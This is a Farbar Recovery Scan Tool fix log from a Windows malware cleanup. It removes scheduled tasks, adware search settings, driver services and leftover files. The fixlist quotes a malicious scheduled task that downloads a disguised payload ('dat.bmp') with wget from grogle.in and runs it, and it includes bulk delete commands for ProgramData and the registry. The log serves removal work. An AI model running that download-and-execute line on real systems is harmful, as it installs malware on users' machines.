Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 04-02-2015 01 Ran by Proteus at 2015-02-05 19:43:02 Run:1 Running from C:\Users\Proteus\Desktop\FRST Loaded Profiles: Proteus & UpdatusUser (Available profiles: Proteus & UpdatusUser & DefaultAppPool) Boot Mode: Normal ============================================== Content of fixlist: ***************** CloseProcesses: CreateRestorePoint: Task: {2B0FCD48-6531-4E36-89FA-214F118F1445} - System32\Tasks\{F11B7F52-71B1-40A5-B2D0-7E2A96AD8C9E} => pcalua.exe -a C:\Users\Proteus\Downloads\Huawei_Drivers_v4.25.11.00\Driver\DriverSetup.exe -d C:\Users\Proteus\Downloads\Huawei_Drivers_v4.25.11.00\Driver Task: {8C97B981-9056-421B-A12D-7C43087905C6} - System32\Tasks\{07CD315F-8D34-4281-AC9E-4CEFE4534D41} => pcalua.exe -a "C:\Program Files (x86)\PLAY ONLINE\uninst.exe" Task: {8F39E590-088F-4A09-95CC-41AD1FDCBEC1} - System32\Tasks\{61BD271E-EF2E-4AC1-8FD9-3097ABF7B4DA} => pcalua.exe -a "C:\Program Files\AVAST Software\Avast\aswRunDll.exe" -c "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup Task: {BA832787-7A2E-46E3-8854-CB91F631F134} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=embX3iyw8R;camtasia.exe;1422474927 & start cmd /R dat.bmp <==== ATTENTION Task: {C99679AE-306B-4F01-927D-DA1BFF564E10} - System32\Tasks\{2C909A96-50CC-46F5-AA7E-7AD6831ED2EC} => pcalua.exe -a C:\ProgramData\LGMOBILEAX\LGMLauncher.exe -d C:\ProgramData\LGMOBILEAX CustomCLSID: HKU\S-1-5-21-2603393732-3475753062-4034012456-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\...\Run: [Akamai NetSession Interface] => "C:\Users\Proteus\AppData\Local\Akamai\netsession_win.exe" ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie SearchScopes: HKU\S-1-5-21-2603393732-3475753062-4034012456-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear SearchScopes: HKU\S-1-5-21-2603393732-3475753062-4034012456-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = FF HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff CHR DefaultSuggestURL: Default -> http://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms} S3 cpuz130; \??\C:\Users\Proteus\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X] S3 cpuz137; \??\C:\Windows\TEMP\cpuz137\cpuz137_x64.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] C:\Program Files (x86)\GUT73DA.tmp C:\ProgramData\TEMP C:\Users\Proteus\Downloads\M-Kernel_*.zip C:\Users\Proteus\Downloads\sh-remover.exe CMD: del /q C:\ProgramData\*.* Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: ***************** Processes closed successfully. Error: (0) Failed to create a restore point. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2B0FCD48-6531-4E36-89FA-214F118F1445}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2B0FCD48-6531-4E36-89FA-214F118F1445}" => Key deleted successfully. C:\Windows\System32\Tasks\{F11B7F52-71B1-40A5-B2D0-7E2A96AD8C9E} => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F11B7F52-71B1-40A5-B2D0-7E2A96AD8C9E}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8C97B981-9056-421B-A12D-7C43087905C6}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8C97B981-9056-421B-A12D-7C43087905C6}" => Key deleted successfully. C:\Windows\System32\Tasks\{07CD315F-8D34-4281-AC9E-4CEFE4534D41} => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{07CD315F-8D34-4281-AC9E-4CEFE4534D41}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8F39E590-088F-4A09-95CC-41AD1FDCBEC1}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8F39E590-088F-4A09-95CC-41AD1FDCBEC1}" => Key deleted successfully. C:\Windows\System32\Tasks\{61BD271E-EF2E-4AC1-8FD9-3097ABF7B4DA} => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{61BD271E-EF2E-4AC1-8FD9-3097ABF7B4DA}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BA832787-7A2E-46E3-8854-CB91F631F134}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA832787-7A2E-46E3-8854-CB91F631F134}" => Key deleted successfully. C:\Windows\System32\Tasks\SYSTEM => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C99679AE-306B-4F01-927D-DA1BFF564E10}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C99679AE-306B-4F01-927D-DA1BFF564E10}" => Key deleted successfully. C:\Windows\System32\Tasks\{2C909A96-50CC-46F5-AA7E-7AD6831ED2EC} => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2C909A96-50CC-46F5-AA7E-7AD6831ED2EC}" => Key deleted successfully. "HKU\S-1-5-21-2603393732-3475753062-4034012456-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}" => Key deleted successfully. HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Akamai NetSession Interface => value deleted successfully. "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => Key deleted successfully. HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => Key not found. HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main\\Search Bar => value deleted successfully. HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully. "HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key deleted successfully. HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => Key not found. HKU\S-1-5-21-2603393732-3475753062-4034012456-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value not found. HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Mozilla\Firefox\Extensions\\{B64D9B05-48E1-4CEB-BF58-E0643994E900} => value deleted successfully. Chrome DefaultSuggestURL not detected. cpuz130 => Service deleted successfully. cpuz137 => Service deleted successfully. ew_hwusbdev => Service deleted successfully. ew_usbenumfilter => Service deleted successfully. GPUZ => Service deleted successfully. huawei_cdcacm => Service deleted successfully. huawei_enumerator => Service deleted successfully. huawei_ext_ctrl => Service deleted successfully. huawei_wwanecm => Service deleted successfully. hwdatacard => Service deleted successfully. C:\Program Files (x86)\GUT73DA.tmp => Moved successfully. C:\ProgramData\TEMP => Moved successfully. C:\Users\Proteus\Downloads\M-Kernel_*.zip => Moved successfully. C:\Users\Proteus\Downloads\sh-remover.exe => Moved successfully. ========= del /q C:\ProgramData\*.* ========= ========= End of CMD: ========= ========= reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f ========= Operacja ukoäczona pomy˜lnie. ========= End of Reg: ========= ========= reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f ========= Operacja ukoäczona pomy˜lnie. ========= End of Reg: ========= ========= reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f ========= Operacja ukoäczona pomy˜lnie. ========= End of Reg: ========= ========= reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f ========= Operacja ukoäczona pomy˜lnie. ========= End of Reg: ========= EmptyTemp: => Removed 1.1 GB temporary data. The system needed a reboot. ==== End of Fixlog 19:43:24 ====